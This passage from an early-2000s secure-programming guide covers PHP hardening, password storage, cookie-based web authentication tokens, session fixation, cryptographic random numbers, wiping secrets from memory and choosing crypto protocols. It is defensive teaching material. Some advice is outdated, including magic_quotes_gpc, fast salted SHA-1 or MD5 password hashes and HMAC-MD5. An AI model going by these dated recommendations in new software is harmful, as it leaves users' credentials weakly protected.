script; that way, you're protected if (1) you forget to insert the
command at the top of the script, or (2) move the program to another
machine and forget to change the php.ini file. Thus, every PHP program
should begin like this:
<?php error_reporting(E_ALL);?>
It could be argued that this error reporting should be turned on during
development, but turned off when actually run on a real site (since such
error messages could give useful information to an attacker). The problem
is that if they're disabled during ``actual use'' it's all too easy to
leave them disabled during development. So for the moment, I suggest the
simple approach of including it in every entry point. A much better
approach is to record all errors, but direct the error reports so they're
only included in a log file (instead of having them reported to the
attacker).
  * Filter any user information used to create filenames carefully, in
particular to prevent remote file access. PHP by default comes with
``remote files'' functionality -- that means that file-opening commands
like fopen(), that in other languages can only open local files, can
actually be used to invoke web or ftp requests from another site.
  * Do not use old-style PHP file uploads; use the HTTP_POST_FILES array and
related functions. PHP supports file uploads by uploading the file to
some temporary directory with a special filename. PHP originally set a
collection of variables to indicate where that filename was, but since an
attacker can control variable names and their values, attackers could use
that ability to cause great mischief. Instead, always use HTTP_POST_FILES
and related functions to access uploaded files. Note that even in this
case, PHP's approach permits attackers to temporarily upload files to you
with arbitrary content, which is risky by itself.
  * Only place protected entry points in the document tree; place all other
code (which should be most of it) outside the document tree. PHP has a
history of unfortunate advice on this topic. Originally, PHP users were
supposed to use the ``.inc'' (include) extension for ``included'' files,
but these included files often had passwords and other information, and
Apache would just give requesters the contents of the ``.inc'' files when
asked to do so when they were in the document tree. Then developers gave
all files a ``.php'' extension - which meant that the contents weren't
seen, but now files never meant to be entry points became entry points
and were sometimes exploitable. As mentioned earlier, the usual security
advice is the best: place only the protected entry points (files) in the
document tree, and place other code (e.g., libraries) outside the
document tree. There shouldn't be any ``.inc'' files in the document tree
at all.
  * Avoid the session mechanism. The ``session'' mechanism is handy for
storing persistent data, but its current implementation has many
problems. First, by default sessions store information in temporary files
- so if you're on a multi-hosted system, you open yourself up to many
attacks and revelations. Even those who aren't currently multi-hosted may
find themselves multi-hosted later! You can "tie" this information into a
database instead of the filesystem, but if others on a multi-hosted
database can access that database with the same permissions, the problem
is the same. There are also ambiguities if you're not careful (``is this
the session value or an attacker's value''?) and this is another case
where an attacker can force a file or key to reside on the server with
content of their choosing - a dangerous situation - and the attacker can
even control to some extent the name of the file or key where this data
will be placed.
  * For all inputs, check that they match a pattern for acceptability (as
with any language), and then use type casting to coerce non-string data
into the type it should have. Develop ``helper'' functions to easily
check and import a selected list of (expected) inputs. PHP is loosely
typed, and this can cause trouble. For example, if an input datum has the
value "000", it won't be equal to "0" nor is it empty(). This is
particularly important for associative arrays, because their indexes are
strings; this means that $data["000"] is different than $data["0"]. For
example, to make sure $bar has type double (after making sure it only has
the format legal for a double):
$bar = (double) $bar;
  * Be especially careful of risky functions. This includes those that
perform PHP code execution (e.g., require(), include(), eval(),
preg_replace()), command execution (e.g., exec(), passthru(), the
backtick operator, system(), and popen()), and open files (e.g., fopen(),
readfile(), and file()). This is not an exhaustive list!
  * Use magic_quotes_gpc() where appropriate - this eliminates many kinds of
attacks.
  * Avoid file uploads, and consider modifying the php.ini file to disable
them (file_uploads = Off). File uploads have had security holes in the
past, so on older PHP's this is a necessity, and until more experience
shows that they're safe this isn't a bad thing to remove. Remember, in
general, to secure a system you should disable or remove anything you
don't need.
-----------------------------------------------------------------------------
Chapter 11. Special Topics
    Understanding is a fountain of life to those who have it, but folly
    brings punishment to fools.
        Proverbs 16:22 (NIV)
-----------------------------------------------------------------------------
11.1. Passwords
Where possible, don't write code to handle passwords. In particular, if the
application is local, try to depend on the normal login authentication by a
user. If the application is a CGI script, try to depend on the web server to
provide the protection as much as possible - but see below about handling
authentication in a web server. If the application is over a network, avoid
sending the password as cleartext (where possible) since it can be easily
captured by network sniffers and reused later. ``Encrypting'' a password
using some key fixed in the algorithm or using some sort of shrouding
algorithm is essentially the same as sending the password as cleartext.
For networks, consider at least using digest passwords. Digest passwords are
passwords developed from hashes; typically the server will send the client
some data (e.g., date, time, name of server), the client combines this data
with the user password, the client hashes this value (termed the ``digest
password'') and replies with just the hashed result to the server; the server
verifies this hash value. This works, because the password is never actually
sent in any form; the password is just used to derive the hash value. Digest
passwords aren't considered ``encryption'' in the usual sense and are usually
accepted even in countries with laws constraining encryption for
confidentiality. Digest passwords are vulnerable to active attack threats but
protect against passive network sniffers. One weakness is that, for digest
passwords to work, the server must have all the unhashed passwords, making
the server a very tempting target for attack.
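The exchange described above can be sketched as follows. This is a minimal illustration, not any particular protocol; the function names and the choice of SHA-256 are assumptions for the sketch:

```python
import hashlib
import hmac
import os

def make_challenge():
    # The server sends unpredictable data (here random bytes; the date, time,
    # and server name are other possibilities mentioned above).
    return os.urandom(16).hex()

def digest_response(challenge, password):
    # The client combines the challenge with the password and hashes it; only
    # this hash crosses the network, never the password itself.
    return hashlib.sha256((challenge + password).encode()).hexdigest()

def server_verify(challenge, stored_password, reply):
    # The server, which must hold the unhashed password, recomputes the same
    # digest and compares in constant time.
    expected = digest_response(challenge, stored_password)
    return hmac.compare_digest(expected, reply)
```

Note that the server's need to keep unhashed passwords, as discussed above, is visible here in server_verify.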
If your application permits users to set their passwords, check the passwords
and permit only ``good'' passwords (e.g., not in a dictionary, having certain
minimal length, etc.). You may want to look at information such as [http://
consult.cern.ch/writeup/security/security_3.html] http://consult.cern.ch/
writeup/security/security_3.html on how to choose a good password. You should
use PAM if you can, because it supports pluggable password checkers.
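A password-acceptance check along these lines might look like the following sketch; the minimum length and the tiny word list are placeholders, and a real deployment would consult a full dictionary or a pluggable checker such as PAM provides:

```python
# Placeholder word list; a real check would use a full dictionary.
COMMON_WORDS = {"password", "letmein", "qwerty"}

def is_good_password(pw, min_len=8):
    # Reject passwords that are too short.
    if len(pw) < min_len:
        return False
    # Reject dictionary words.
    if pw.lower() in COMMON_WORDS:
        return False
    # Require a mix: at least one letter and one non-letter character.
    has_alpha = any(c.isalpha() for c in pw)
    has_other = any(not c.isalpha() for c in pw)
    return has_alpha and has_other
```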
-----------------------------------------------------------------------------
11.2. Authenticating on the Web
On the web, a web server is usually authenticated to users by using SSL or
TLS and a server certificate - but it's not as easy to authenticate who the
users are. SSL and TLS do support client-side certificates, but there are
many practical problems with actually using them (e.g., web browsers don't
support a single user certificate format and users find it difficult to
install them). You can learn about how to set up digital certificates from
many places, e.g., [http://www.petbrain.com/modules.php?op=modload&name=pki&
file=index] Petbrain. Using Java or Javascript has its own problems, since
many users disable them, some firewalls filter them out, and they tend to be
slow. In most cases, requiring every user to install a plug-in is impractical
too, though if the system is only for an intranet for a relatively small
number of users this may be appropriate.
If you're building an intranet application, you should generally use whatever
authentication system is used by your users. Unix-like systems tend to use
Kerberos, NIS+, or LDAP. You may also need to deal with Windows-based
authentication schemes (which can be viewed as proprietary variants of
Kerberos and LDAP). Thus, if your organization depends on Kerberos, design
your system to use Kerberos. Try to separate the authentication system from
the rest of your application, since the organization may (will!) change their
authentication system over time.
Many techniques don't work or don't work very well. One approach that works
in some cases is to use ``basic authentication'', which is built into
essentially all browsers and servers. Unfortunately, basic authentication
sends passwords unencrypted, so it makes passwords easy to steal; basic
authentication by itself is really useful only for worthless information. You
could store authentication information in the URLs selected by the users, but
for most circumstances you should never do this - not only are the URLs sent
unprotected over the wire (as with basic authentication), but there are too
many other ways that this information can leak to others (e.g., through the
browser history logs stored by many browsers, logs of proxies, and to other
web sites through the Referer: field). You could wrap all communication with
a web server using an SSL/TLS connection (which would encrypt it); this is
secure (depending on how you do it), and it's necessary if you have important
data, but note that this is costly in terms of performance. You could also
use ``digest authentication'', which exposes the communication but at least
authenticates the user without exposing the underlying password used to
authenticate the user. Digest authentication is intended to be a simple
partial solution for low-value communications, but digest authentication is
not widely supported in an interoperable way by web browsers and servers. In
fact, as noted in a March 18, 2002 eWeek article, Microsoft's web client
(Internet Explorer) and web server (IIS) incorrectly implement the standard
(RFC 2617), and thus won't work with other servers or browsers. Since
Microsoft doesn't view this incorrect implementation as a serious problem, it
will be a very long time before most of their customers have a
correctly-working program.
Thus, the most common technique for authenticating on the web today is
through cookies. Cookies weren't really designed for this purpose, but they
can be used for authentication - but there are many wrong ways to use them
that create security vulnerabilities, so be careful. For more information
about cookies, see IETF RFC 2965, along with the older specifications about
them. Note that to use cookies, some browsers (e.g., Microsoft Internet
Explorer 6) may insist that you have a privacy profile (named p3p.xml on the
root directory of the server).
Note that some users don't accept cookies, so this solution still has some
problems. If you want to support these users, you should send this
authentication information back and forth via HTML form hidden fields (since
nearly all browsers support them without concern). You'd use the same
approach as with cookies - you'd just use a different technology to have the
data sent from the user to the server. Naturally, if you implement this
approach, you need to include settings to ensure that these pages aren't
cached for use by others. However, while I think avoiding cookies is
preferable, in practice these other approaches often require much more
development effort. Since it's so hard to implement this on a large scale for
many application developers, I'm not currently stressing these approaches. I
would rather describe an approach that is reasonably secure and reasonably
easy to implement, than emphasize approaches that are too hard to implement
correctly (by either developers or users). However, if you can do so without
much effort, by all means support sending the authentication information
using form hidden fields and an encrypted link (e.g., SSL/TLS). As with all
cookies, for these cookies you should turn on the HttpOnly flag unless you
have a web browser script that must be able to read the cookie.
Fu [2001] discusses client authentication on the web, along with a suggested
approach, and this is the approach I suggest for most sites. The basic idea
is that client authentication is split into two parts, a ``login procedure''
and ``subsequent requests.'' In the login procedure, the server asks for the
user's username and password, the user provides them, and the server replies
with an ``authentication token''. In the subsequent requests, the client (web
browser) sends the authentication token to the server (along with its
request); the server verifies that the token is valid, and if it is, services
the request. Another good source of information about web authentication is
Seifried [2001].
One serious problem with some web authentication techniques is that they are
vulnerable to a problem called "session fixation". In a session fixation
attack, the attacker fixes the user's session ID before the user even logs
into the target server, thus eliminating the need to obtain the user's
session ID afterwards. Basically, the attacker obtains an account, and then
tricks another user into using the attacker's account - often by creating a
special hypertext link and tricking the user into clicking on it. A good
paper describing session fixation is the paper by [http://www.acros.si/papers
/session_fixation.pdf] Mitja Kolsek [2002]. A web authentication system you
use should be resistant to session fixation.
-----------------------------------------------------------------------------
11.2.1. Authenticating on the Web: Logging In
The login procedure is typically implemented as an HTML form; I suggest using
the field names ``username'' and ``password'' so that web browsers can
automatically perform some useful actions. Make sure that the password is
sent over an encrypted connection (using SSL or TLS, through an https:
connection) - otherwise, eavesdroppers could collect the password. Make sure
all password text fields are marked as passwords in the HTML, so that the
password text is not visible to anyone who can see the user's screen.
If both the username and password fields are filled in, do not try to
automatically log in as that user. Instead, display the login form with the
user and password fields; this lets the user verify that they really want to
log in as that user. If you fail to do this, attackers will be able to
exploit this weakness to perform a session fixation attack. Paranoid systems
might want to simply ignore the password field and make the user fill it in, but
this interferes with browsers which can store passwords for users.
When the user sends username and password, it must be checked against the
user account database. This database shouldn't store the passwords ``in the
clear'', since if someone got a copy of this database they'd suddenly get
everyone's password (and users often reuse passwords). Some use crypt() to
handle this, but crypt can only handle a small input, so I recommend using a
different approach (this is my approach - Fu [2001] doesn't discuss this).
Instead, the user database should store a username, salt, and the password
hash for that user. The ``salt'' is just a random sequence of characters,
used to make it harder for attackers to determine a password even if they get
the password database - I suggest an 8-character random sequence. It doesn't
need to be cryptographically random, just different from other users' salts.
password hash should be computed by concatenating ``server key1'', the user's
password, and the salt, and then running a cryptographically secure hash
algorithm. Server key1 is a secret key unique to this server - keep it
separate from the password database. Someone who has server key1 could then
run programs to crack user passwords if they also had the password database;
since it doesn't need to be memorized, it can be a long and complex password.
Most secure would be HMAC-SHA-1 or HMAC-MD5; you could use SHA-1 (most web
sites aren't really worried about the attacks it allows) or MD5 (but MD5
would be a poorer choice; see the discussion about MD5).
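The storage scheme just described might be sketched like this. It's an illustration with placeholder names; SERVER_KEY1 here stands for the secret kept outside the password database:

```python
import hashlib
import hmac
import os

SERVER_KEY1 = b"example-long-server-secret"   # placeholder; keep outside the DB

def new_salt():
    # An 8-byte random salt, hex-encoded; it only needs to differ per user.
    return os.urandom(8).hex()

def password_hash(password, salt):
    # HMAC keyed with server key1 over password + salt, per the scheme above.
    return hmac.new(SERVER_KEY1, (password + salt).encode(),
                    hashlib.sha1).hexdigest()

def check_login(stored_salt, stored_hash, attempt):
    # Recompute the hash for the attempted password and compare in
    # constant time against what the database stores.
    return hmac.compare_digest(stored_hash,
                               password_hash(attempt, stored_salt))
```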
Thus, when users create their accounts, the password is hashed and placed in
the password database. When users try to log in, the purported password is
hashed and compared against the hash in the database (they must be equal).
When users change their password, they should type in both the old and new
password, and the new password twice (to make sure they didn't mistype it);
and again, make sure none of these passwords' characters are visible on the
screen.
By default, don't save the passwords themselves on the client's web browser
using cookies - users may sometimes use shared clients (say at some coffee
shop). If you want, you can give users the option of ``saving the password''
on their browser, but if you do, make sure that the password is set to only
be transmitted on ``secure'' connections, and make sure the user has to
specifically request it (don't do this by default).
Make sure that the page is marked to not be cached, or a proxy server might
re-serve that page to other users.
Once a user successfully logs in, the server needs to send the client an
``authentication token'' in a cookie, which is described next.
-----------------------------------------------------------------------------
11.2.2. Authenticating on the Web: Subsequent Actions
Once a user logs in, the server sends back to the client a cookie with an
authentication token that will be used from then on. A separate
authentication token is used, so that users don't need to keep logging in, so
that passwords aren't continually sent back and forth, and so that
unencrypted communication can be used if desired. A suggested token (ignoring
session fixation attacks) would look like this:
exp=t&data=s&digest=m
Where t is the expiration time of the token (say, in several hours), and data
s identifies the user (say, the user name or session id). The digest is a
keyed digest of the other fields. Feel free to change the field name of
``data'' to be more descriptive (e.g., username and/or sessionid). If you
have more than one field of data (e.g., both a username and a sessionid),
make sure the digest uses both the field names and data values of all fields
you're authenticating; concatenate them with a pattern (say ``%%'', ``+'', or
``&'') that can't occur in any of the field data values. As described in a
moment, it would be a good idea to include a username. The keyed digest
should be a cryptographic hash of the other information in the token, keyed
using a different server key2. The keyed digest should use HMAC-MD5 or
HMAC-SHA1, using a different server key (key2), though simply using SHA1
might be okay for some purposes (or even MD5, if the risks are low). Key2 is
subject to brute force guessing attacks, so it should be long (say 12+
characters) and unguessable; it does NOT need to be easily remembered. If
this key2 is compromised, anyone can authenticate to the server, but it's
easy to change key2 - when you do, it'll simply force currently ``logged in''
users to re-authenticate. See Fu [2001] for more details.
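A minimal sketch of issuing and verifying such a token follows. The field layout is simplified to exp and data, and SERVER_KEY2 and the helper names are placeholders:

```python
import hashlib
import hmac
import time

SERVER_KEY2 = b"another-long-unguessable-key"  # placeholder; distinct from key1

def make_token(user, lifetime=3600, now=None):
    # Build "exp=t&data=s" and append a keyed digest over those fields.
    exp = int(now if now is not None else time.time()) + lifetime
    payload = "exp=%d&data=%s" % (exp, user)
    digest = hmac.new(SERVER_KEY2, payload.encode(), hashlib.sha1).hexdigest()
    return payload + "&digest=" + digest

def check_token(token, now=None):
    # Recompute the digest over everything before "&digest=", then check expiry.
    payload, sep, digest = token.rpartition("&digest=")
    expected = hmac.new(SERVER_KEY2, payload.encode(), hashlib.sha1).hexdigest()
    if not (sep and hmac.compare_digest(digest, expected)):
        return False
    exp = int(payload.split("&")[0].split("=", 1)[1])
    return (now if now is not None else time.time()) < exp
```

Changing SERVER_KEY2 invalidates every outstanding token at once, forcing the re-authentication described above.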
There is a potential weakness in this approach. I have concerns that Fu's
approach, as originally described, is weak against session fixation attacks
(from several different directions, which I don't want to get into here).
Thus, I now suggest modifying Fu's approach and using this token format
instead:
exp=t&data=s&client=c&digest=m
This modifies the original Fu approach; older versions of this book
(before December 2002) didn't suggest it. The modification adds a new
"client" field to uniquely identify the client's current location/identity.
The data in the client field should be something that should change if
someone else tries to use the account; ideally, its new value should be
unguessable, though that's hard to accomplish in practice. Ideally the client
field would be the client's SSL client certificate, but currently that's a
suggestion that is hard to meet. At the least, it should be the user's IP
address (as perceived from the server, and remember to plan for IPv6's longer
addresses). This modification doesn't completely counter session fixation
attacks, unfortunately (since if an attacker can determine what the user
would send, the attacker may be able to make a request to a server and
convince the client to accept those values). However, it does add resistance
to the attack. Again, the digest must now include all the other data.
Here's an example. If a user logs into foobar.com successfully, you might
establish the expiration date as 2002-12-30T1800 (let's assume we'll transmit
as ASCII text in this format for the moment), the username as "fred", the
client session as "1234", and you might determine that the client's IP
address was 5.6.7.8. If you use a simple SHA-1 keyed digest (and use a key
prefixing the rest of the data), with the server key2 value of "rM!V^m~v*
Dzx", the digest could be computed over:
exp=2002-12-30T1800&user=fred&session=1234&client=5.6.7.8
A keyed digest can be computed by running a cryptographic hash code over,
say, the server key2, then the data; in this case, the digest would be:
101cebfcc6ff86bc483e0538f616e9f5e9894d94
From then on, the server must check the expiration time and recompute the
digest of this authentication token, and only accept client requests if the
digest is correct. If there's no token, the server should reply with the user
login page (with a hidden form field to show where the successful login
should go afterwards).
It would be prudent to display the username, especially on important screens,
to help counter session fixation attacks. If users are given feedback on
their username, they may notice if they don't have their expected username.
This is helpful anyway if it's possible to have an unexpected username (e.g.,
a family that shares the same machine). Examples of important screens include
those when a file is uploaded that should be kept private.
One odd implementation issue: although the specifications for the "Expires:"
(expiration time) field for cookies permit time zones, it turns out that some
versions of Microsoft's Internet Explorer don't implement time zones
correctly for cookie expiration. Thus, you need to always use UTC time (also
called Zulu time) in cookie expiration times for maximum portability. It's a
good idea in general to use UTC time for time values, and convert when
necessary for human display, since this eliminates other time zone and
daylight savings time issues.
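For instance, a cookie ``Expires:'' value can be rendered in UTC like this (a small sketch; the dash-separated date form is the old Netscape cookie style):

```python
import datetime

def cookie_expires(dt_utc):
    # Render a UTC timestamp in the "Wdy, DD-Mon-YYYY HH:MM:SS GMT" cookie
    # form; always GMT, never a local time zone.
    return dt_utc.strftime("%a, %d-%b-%Y %H:%M:%S GMT")
```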
If you include a sessionid in the authentication token, you can limit access
further. Your server could ``track'' what pages a user has seen in a given
session, and only permit access to other appropriate pages from that point
(e.g., only those directly linked from those page(s)). For example, if a user
is granted access to page foo.html, and page foo.html has pointers to
resources bar1.jpg and bar2.png, then accesses to bar4.cgi can be rejected.
You could even kill the session, though only do this if the authentication
information is valid (otherwise, this would make it possible for attackers to
cause denial-of-service attacks on other users). This would somewhat limit
the access an attacker has, even if they successfully hijack a session,
though clearly an attacker with time and an authentication token could
``walk'' the links just as a normal user would.
One decision is whether or not to require the authentication token and/or
data to be sent over a secure connection (e.g., SSL). If you send an
authentication token in the clear (non-secure), someone who intercepts the
token could do whatever the user could do until the expiration time. Also,
when you send data over an unencrypted link, there's the risk of unnoticed
change by an attacker; if you're worried that someone might change the data
on the way, then you need to authenticate the data being transmitted.
Encryption by itself doesn't guarantee authentication, but it does make
corruption more likely to be detected, and typical libraries can support both
encryption and authentication in a TLS/SSL connection. In general, if you're
encrypting a message, you should also authenticate it. If your needs vary,
one alternative is to create two authentication tokens - one is used only in
a ``secure'' connection for important operations, while the other used for
less-critical operations. Make sure the token used for ``secure'' connections
is marked so that only secure connections (typically encrypted SSL/TLS
connections) are used. If users aren't really different, the authentication
token could omit the ``data'' entirely.
Again, make sure that the pages with this authentication token aren't cached.
There are other reasonable schemes also; the goal of this text is to provide
at least one secure solution. Many variations are possible.
-----------------------------------------------------------------------------
11.2.3. Authenticating on the Web: Logging Out
You should always provide users with a mechanism to ``log out'' - this is
especially helpful for customers using shared browsers (say at a library).
Your ``logout'' routine's task is simple - just unset the client's
authentication token.
-----------------------------------------------------------------------------
11.3. Random Numbers
In many cases secure programs must generate ``random'' numbers that cannot be
guessed by an adversary. Examples include session keys, public or private
keys, symmetric keys, nonces and IVs used in many protocols, salts, and so
on. Ideally, you should use a truly random source of data for random numbers,
such as values based on radioactive decay (through precise timing of Geiger
counter clicks), atmospheric noise, or thermal noise in electrical circuits.
Some computers have a hardware component that functions as a real random
value generator, and if it's available you should use it.
However, most computers don't have hardware that generates truly random
values, so in most cases you need a way to generate random numbers that is
sufficiently random that an adversary can't predict it. In general, this
means that you'll need three things:
  * An ``unguessable'' state; typically this is done by measuring variances
in timing of low-level devices (keystrokes, disk drive arm jitter, etc.)
in a way that an adversary cannot control.
  * A cryptographically strong pseudo-random number generator (PRNG), which
uses the state to generate ``random'' numbers.
  * A large number of bits (in both the seed and the resulting value used).
There's no point in having a strong PRNG if you only have a few possible
values, because this makes it easy for an attacker to use brute force
attacks. The number of bits necessary varies depending on the
circumstance; however, since these are often used as cryptographic keys,
the normal rules of thumb for keys apply. For a symmetric key (result),
I'd use at least 112 bits (3DES), 128 bits is a little better, and 160
bits or more is even safer.
Typically the PRNG uses the state to generate some values, and then some of
its values and other unguessable inputs are used to update the state. There
are lots of ways to attack these systems. For example, if an attacker can
control or view inputs to the state (or parts of it), the attacker may be
able to determine your supposedly ``random'' number.
A real danger with PRNGs is that most computer language libraries include a
large set of pseudo-random number generators (PRNGs) which are inappropriate
for security purposes. Let me say it again: do not use typical random number
generators for security purposes. Typical library PRNGs are intended for use
in simulations, games, and so on; they are not sufficiently random for use in
security functions such as key generation. Most non-cryptographic library
PRNGs are some variation of ``linear congruential generators'', where the
``next'' random value is computed as "(aX + b) mod m" (where X is the previous
value). Good linear congruential generators are fast and have useful
statistical properties, making them appropriate for their intended uses. The
problem with such PRNGs is that future values can be easily deduced by an
attacker (though they may appear random). Other algorithms for generating
random numbers quickly, such as quadratic generators and cubic generators,
have also been broken [Schneier 1996]. In short, you have to use
cryptographically strong PRNGs to generate random numbers in secure
applications - ordinary random number libraries are not sufficient.
Failing to correctly generate truly random values for keys has caused a
number of problems, including holes in Kerberos, the X window system, and NFS
[Venema 1996].
If possible, you should use system services (typically provided by the
operating system) that are expressly designed to create cryptographically
secure random values. For example, the Linux kernel (since 1.3.30) includes a
random number generator, which is sufficient for many security purposes. This
random number generator gathers environmental noise from device drivers and
other sources into an entropy pool. When accessed as /dev/random, random
bytes are only returned within the estimated number of bits of noise in the
entropy pool (when the entropy pool is empty, the call blocks until
additional environmental noise is gathered). When accessed as /dev/urandom,
as many bytes as are requested are returned even when the entropy pool is
exhausted. If you are using the random values for cryptographic purposes
(e.g., to generate a key) on Linux, use /dev/random. *BSD systems also
include /dev/random. Solaris users with the SUNWski package also have /dev/
random. Note that if a hardware random number generator is available and its
driver is installed, it will be used instead. More information is available
in the system documentation random(4).
On other systems, you'll need to find another way to get truly random
results. One possibility for other Unix-like systems is the Entropy Gathering
Daemon (EGD), which monitors system activity and hashes it into random
values; you can get it at [http://www.lothar.com/tech/crypto] http://
www.lothar.com/tech/crypto. You might consider using a cryptographic hash
function (e.g., SHA-1) on PRNG outputs. By using a hash algorithm, even if
the PRNG turns out to be guessable, this means that the attacker must now
also break the hash function.
If you have to implement a strong PRNG yourself, a good choice for a
cryptographically strong (and patent-unencumbered) PRNG is the Yarrow
algorithm; you can learn more about Yarrow from [http://www.counterpane.com/
yarrow.html] http://www.counterpane.com/yarrow.html. Some other PRNGs can be
useful, but many widely-used ones have known weaknesses that may or may not
matter depending on your application. Before implementing a PRNG yourself,
consult the literature, such as [Kelsey 1998] and [McGraw 2000a]. You should
also examine [http://www.ietf.org/rfc/rfc1750.txt] IETF RFC 1750. NIST has
some useful information; see the [http://csrc.nist.gov/publications/nistpubs/
800-22/sp-800-22-051501.pdf] NIST publication 800-22 and [http://
csrc.nist.gov/publications/nistpubs/800-22/errata-sheet.pdf] NIST errata. You
should know about the [http://stat.fsu.edu/~geo/diehard.html] diehard tests
too. You might want to examine the paper titled "how Intel checked its PRNG",
but unfortunately that paper appears to be unavailable now.
-----------------------------------------------------------------------------
11.4. Specially Protect Secrets (Passwords and Keys) in User Memory
If your application must handle passwords or non-public keys (such as session
keys, private keys, or secret keys), try to hide them and overwrite them
immediately after using them so they have minimal exposure.
Systems such as Linux support the mlock() and mlockall() calls to keep memory
from being paged to disk (since someone might acquire the key later from the
swap file). Note that on Linux this is a privileged system call, which causes
its own issues (do I grant the program superuser privileges so it can call
mlock, if it doesn't need them otherwise?).
Also, if your program handles such secret values, be sure to disable creating
core dumps (via ulimit). Otherwise, an attacker may be able to halt the
program and find the secret value in the data dump.
Beware - normally processes can monitor other processes through the calls for
debuggers (e.g., via ptrace(2) and the /proc pseudo-filesystem) [Venema 1996].
Kernels usually protect against these monitoring routines if the process is
setuid or setgid (on the few ancient ones that don't, there really isn't a
good way to defend yourself other than upgrading). Thus, if your process
manages secret values, you probably should make it setgid or setuid (to a
different unprivileged group or user) to forcibly inhibit this kind of
monitoring. Unless you need it to be setuid, use setgid (since this grants
fewer privileges).
Then there's the problem of being able to actually overwrite the value, which
often becomes language and compiler specific. In many languages, you need to
make sure that you store such information in mutable locations, and then
overwrite those locations. For example, in Java, don't use the type String to
store a password because Strings are immutable (they will not be overwritten
until garbage-collected and then reused, possibly far in the future).
Instead, in Java use char[] to store a password, so it can be immediately
overwritten. In Ada, use type String (an array of characters), and not type
Unbounded_String, to make sure that you have control over the contents.
In many languages (including C and C++), be careful that the compiler doesn't
optimize away the "dead code" for overwriting the value - since in this case
it's not dead code. Many compilers, including many C/C++ compilers, remove
writes to stores that are no longer used - this is often referred to as "dead
store removal." Unfortunately, if the write is really to overwrite the value
of a secret, this means that code that appears to be correct will be silently
discarded. Ada provides the pragma Inspection_Point; place this after the
code erasing the memory, and that way you can be certain that the object
containing the secret will really be erased (and that the overwriting
won't be optimized away).
A Bugtraq post by Andy Polyakov (November 7, 2002) reported that the C/C++
compilers gcc version 3 or higher, SGI MIPSpro, and the Microsoft compilers
eliminated simple inlined calls to memset intended to overwrite secrets. This
is allowed by the C and C++ standards. Other C/C++ compilers (such as gcc
less than version 3) preserved the inlined call to memset at all optimization
levels, showing that the issue is compiler-specific. Simply declaring that
the destination data is volatile doesn't help on all compilers; both the
MIPSpro and Microsoft compilers ignored simple "volatilization". Simply
"touching" the first byte of the secret data doesn't help either; he found
that the MIPSpro and GCC>=3 cleverly nullify only the first byte and leave
the rest intact (which is actually quite clever - the problem is that the
compiler's cleverness is interfering with our goals). One approach that seems
to work on all platforms is to write your own implementation of memset with
internal "volatilization" of the first argument (this code is based on a
[http://online.securityfocus.com/archive/82/298061/2002-10-27/2002-11-02/0]
workaround proposed by Michael Howard):
void *guaranteed_memset(void *v, int c, size_t n)
{
    volatile char *p = v;
    while (n--)
        *p++ = c;
    return v;
}
Then place this definition into an external file to force the function to be
external (define the function in a corresponding .h file, and #include the
file in the callers, as is usual). This approach appears to be safe at any
optimization level (even if the function gets inlined).
-----------------------------------------------------------------------------
11.5. Cryptographic Algorithms and Protocols
Often cryptographic algorithms and protocols are necessary to keep a system
secure, particularly when communicating through an untrusted network such as
the Internet. Where possible, use cryptographic techniques to authenticate
information and keep the information private (but don't assume that simple
encryption automatically authenticates as well). Generally you'll need to use
a suite of available tools to secure your application.
For background information and code, you should probably look at the classic
text ``Applied Cryptography'' [Schneier 1996]. The newsgroup ``sci.crypt''
has a series of FAQ's; you can find them at many locations, including [http:/
/www.landfield.com/faqs/cryptography-faq] http://www.landfield.com/faqs/
cryptography-faq. Linux-specific resources include the Linux Encryption HOWTO
at [http://marc.mutz.com/Encryption-HOWTO/] http://marc.mutz.com/
Encryption-HOWTO/. A discussion on how protocols use the basic algorithms can
be found in [Opplinger 1998]. A useful collection of papers on how to apply
cryptography in protocols can be found in [Stallings 1996]. What follows here
is just a few comments; these areas are rather specialized and covered more
thoroughly elsewhere.
Cryptographic protocols and algorithms are difficult to get right, so do not
create your own. Instead, where you can, use protocols and algorithms that
are widely-used, heavily analyzed, and accepted as secure. When you must
create anything, give the approach wide public review and make sure that
professional security analysts examine it for problems. In particular, do not
create your own encryption algorithms unless you are an expert in cryptology,
know what you're doing, and plan to spend years in professional review of the
algorithm. Creating encryption algorithms (that are any good) is a task for
experts only.
A number of algorithms are patented; even if the owners permit ``free use''
at the moment, without a signed contract they can always change their minds
later, putting you at extreme risk later. In general, avoid all patented
algorithms - in most cases there's an unpatented approach that is at least as
good or better technically, and by doing so you avoid a large number of legal
problems.
Another complication is that many countries regulate or restrict cryptography
in some way. A survey of legal issues is available at the ``Crypto Law
Survey'' site, [http://rechten.kub.nl/koops/cryptolaw/] http://rechten.kub.nl
/koops/cryptolaw/.
Often, your software should provide a way to reject ``too small'' keys, and
let the user set what ``too small'' is. For RSA keys, 512 bits is too small
for use. There is increasing evidence that 1024 bits for RSA keys is not
enough either; Bernstein has suggested techniques that simplify brute-forcing
RSA, and other work based on it (such as Shamir and Tromer's "Factoring Large
Numbers with the TWIRL device") now suggests that 1024 bit keys can be broken
in a year by a $10 Million device. You may want to make 2048 bits the minimum
for RSA if you really want a secure system, and you should certainly do so if
you plan to use those keys after 2015. For more about RSA specifically, see
RSA's commentary on Bernstein's work. For a more general discussion of key
length and other general cryptographic algorithm issues, see [http://
csrc.nist.gov/encryption/kms/key-management-guideline-(workshop).pdf] NIST's
key management workshop in November 2001.
-----------------------------------------------------------------------------
11.5.1. Cryptographic Protocols
When you need a security protocol, try to use standard-conforming protocols
such as IPSec, SSL (soon to be TLS), SSH, S/MIME, OpenPGP/GnuPG/PGP, and
Kerberos. Each has advantages and disadvantages; many of them overlap
somewhat in functionality, but each tends to be used in different areas:
  * Internet Protocol Security (IPSec). IPSec provides encryption and/or
authentication at the IP packet level. However, IPSec is often used in a
way that only guarantees authenticity of two communicating hosts, not of
the users. As a practical matter, IPSec usually requires low-level
support from the operating system (which not all implement) and an
additional keyring server that must be configured. Since IPSec can be
used as a "tunnel" to secure packets belonging to multiple users and
multiple hosts, it is especially useful for building a Virtual Private
Network (VPN) and connecting a remote machine. As of this time, it is
much less often used to secure communication from individual clients to
servers. The new version of the Internet Protocol, IPv6, comes with IPSec
``built in,'' but IPSec also works with the more common IPv4 protocol.
Note that if you use IPSec, don't use the encryption mode without the
authentication, because the authentication also acts as integrity
protection.
  * Secure Socket Layer (SSL) / TLS. SSL/TLS works over TCP and tunnels other
protocols using TCP, adding encryption, authentication of the server, and
optional authentication of the client (but authenticating clients using
SSL/TLS requires that clients have configured X.509 client certificates,
something rarely done). SSL version 3 is widely used; TLS is a later
adjustment to SSL that strengthens its security and improves its
